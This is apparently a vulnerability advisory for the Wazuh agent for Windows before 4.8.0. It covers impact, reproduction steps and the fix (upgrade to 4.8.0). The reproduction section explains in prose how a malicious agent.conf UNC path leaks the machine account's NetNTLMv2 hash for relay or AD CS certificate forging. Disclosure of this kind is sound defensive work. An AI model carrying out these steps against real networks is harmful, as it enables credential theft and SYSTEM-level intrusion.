Wazuh Agent for Windows Improper Input Validation Vulnerability Leading to Remote Code Execution and Privilege Escalation

A vulnerability in the Wazuh agent for Windows, affecting versions prior to 4.8.0, allows an attacker with control over the Wazuh server or possession of an agent's private key to manipulate the agent's configuration. This manipulation can direct the agent to connect to a malicious UNC path, resulting in the theft of the machine account's NetNTLMv2 hash. This hash can be relayed to execute remote code or used to escalate privileges to the SYSTEM level through Active Directory Certificate Services certificate forging and similar attacks.

Impact

Exploitation of this vulnerability leads to unauthorized remote code execution on the affected system, with the executed code running under the highly privileged 'NT AUTHORITY\System' account. Additionally, the vulnerability allows for local privilege escalation by impersonating the 'NT AUTHORITY\System' account using intercepted NTLMv2 hashes.

Reproduction

To reproduce this vulnerability, add a Wazuh agent to a group with a custom 'agent.conf' file that includes a 'localfile' directive pointing to a UNC path on an attacker's SMB server. Once the agent connects to the server, intercept the NetNTLMv2 hash of the machine account. After obtaining the hash, forge a certificate using Active Directory Certificate Services to authenticate and execute code on any computer in the network.

Remediation

Users are advised to update the Wazuh agent for Windows to version 4.8.0 or later.